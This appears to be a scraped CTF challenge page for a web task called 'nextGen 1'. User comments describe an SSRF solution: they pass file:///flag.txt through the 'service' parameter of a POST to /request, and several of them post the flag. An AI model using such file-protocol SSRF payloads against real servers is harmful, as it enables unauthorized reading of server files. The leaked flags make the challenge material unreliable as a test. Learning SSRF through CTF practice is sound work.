nextGen 1WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: L010
一血奖励: 0金币
解  决: 682
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
> Simple monitoring app.
评论
差距从何而起 11天前

shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf}

回复 0

MOCHAOLIN 16天前

POST /request HTTP/1.1 Host: 82.157.146.43:17387 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

yun20231227 2月前

改为POST请求 /request ?service=file:///flag.txt

回复 0

我孤身一人 3月前

环境貌似不行了

回复 1

xiaoxiao972521 5月前

service=file:////flag.txt

回复 0

15614005380 7月前

属于典型的SSRF漏洞,利用file协议读取flag

回复 0

meilanzhuju 7月前

服务器到底是怎么处理这个service的?是展示这个service指向的url的内容?

回复 0

luskan 7月前

源码最下方看js代码,按照代码内容构建请求,利用service参数夹带私货。

回复 0

868954104 8月前

shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf} service=file://127.0.0.1/flag.txt

回复 1

vchopin 9月前

file:///flag.txt

回复 0

WriteUp

image
hopeinhand

1 金币

评分(3)

解题动态

1148391538 攻破了该题 18小时前
YOULIOU 攻破了该题 1天前
倦鸟叫了一整天 攻破了该题 2天前
bugku20240911 攻破了该题 2天前
Zwhoami 攻破了该题 3天前
Nature_ 攻破了该题 4天前
现实世界 攻破了该题 6天前
LLTVLL 攻破了该题 6天前
spbjzz 攻破了该题 7天前
15185059806 攻破了该题 8天前
liu216 攻破了该题 8天前
yingluojiuchan 攻破了该题 8天前
571403685 攻破了该题 10天前
差距从何而起 攻破了该题 11天前
guoce11 攻破了该题 12天前
南城,北风 攻破了该题 12天前
zzwen6 攻破了该题 13天前
tmk0 攻破了该题 15天前
gotest123 攻破了该题 15天前
oliver99 攻破了该题 15天前
问题反馈